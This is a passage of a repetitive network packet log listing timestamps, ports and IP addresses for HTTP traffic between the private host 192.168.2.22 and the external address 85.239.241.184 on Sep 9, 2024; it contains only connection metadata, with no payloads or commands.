Sep 9, 2024 17:34:42.284832954 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284842014 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284864902 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284969091 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284979105 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.285012960 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.354970932 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.355000019 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.355011940 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.355041981 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.355051994 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.355062008 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.355067968 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.355073929 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.355098009 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.355098009 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364351988 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364363909 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364373922 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364445925 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364474058 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364523888 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364592075 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364603043 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364613056 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364624023 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364634037 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364634991 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364645004 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364660978 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364682913 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364722013 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364732027 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364741087 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364751101 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364768982 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364795923 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364839077 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364849091 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364857912 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364867926 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364886999 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364905119 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.364959955 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.364969969 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365008116 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365017891 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365029097 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365039110 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365048885 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365053892 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365067005 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365092039 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365271091 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365281105 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365289927 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365299940 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365309954 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365312099 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365319967 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365330935 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365334034 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365351915 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365387917 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365397930 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365438938 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365586042 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365596056 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365603924 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365613937 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365629911 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365632057 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365641117 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365650892 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365662098 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365664005 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365672112 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365681887 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365684032 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365693092 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365701914 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365724087 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.365823984 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365833998 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365844965 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.365864992 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366038084 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366048098 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366056919 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366066933 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366077900 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366077900 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366086960 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366096973 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366097927 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366113901 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366122007 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366123915 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366136074 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366147041 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366151094 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366156101 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366166115 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366174936 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366182089 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366185904 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366190910 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366194010 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366228104 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366436005 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366446018 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366455078 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366466045 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366476059 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366477966 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366492987 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366497993 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366507053 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366517067 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366528034 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366550922 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366715908 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366725922 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366734982 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366745949 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366755962 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366758108 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366774082 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366779089 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366791010 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366801977 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366811037 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366815090 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366821051 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366831064 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366833925 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366841078 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366851091 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366851091 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366861105 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.366872072 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.366893053 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367151022 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367161036 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367171049 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367182016 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367192984 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367192984 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367204905 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367216110 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367217064 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367237091 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367306948 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367316961 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367326021 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367336035 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367345095 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367355108 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367364883 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367367983 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367367983 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367376089 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367399931 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367403984 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367408991 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367414951 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367420912 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367434025 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367444038 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.367468119 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.367468119 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.439955950 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.439991951 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.440001011 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.440013885 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.440016985 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.440022945 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.440049887 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.440063000 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.440064907 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.440073013 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.440084934 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.440103054 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451355934 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451411009 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451447010 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451457024 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451462984 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451472998 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451494932 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451513052 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451523066 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451533079 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451543093 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451560020 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451581955 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451633930 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451653004 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451664925 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451690912 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451761007 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451771021 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451781988 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451802969 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451914072 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451925039 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451932907 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451942921 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451956987 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451962948 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451967001 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451977968 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.451981068 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.451987982 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452003002 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452017069 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452020884 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452028036 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452037096 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452055931 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452152967 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452163935 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452169895 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452178955 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452189922 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452202082 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452228069 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452336073 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452347040 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452356100 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452366114 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452377081 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452378988 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452387094 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452398062 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452399969 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452410936 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452420950 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452455044 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452486038 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452497005 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452506065 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452527046 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452572107 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452583075 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452591896 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452606916 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452617884 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452617884 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452639103 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452704906 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452749968 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452774048 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452785015 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452794075 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452802896 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.452822924 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.452841997 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453030109 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453047037 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453057051 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453066111 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453075886 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453084946 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453087091 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453097105 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453104019 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453107119 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453116894 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453125954 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453126907 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453141928 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453145027 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453150988 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453161001 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453171968 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453171968 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453190088 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453212976 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453373909 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453385115 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453396082 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453407049 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453424931 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453448057 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.453536987 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453547955 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.453557014 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
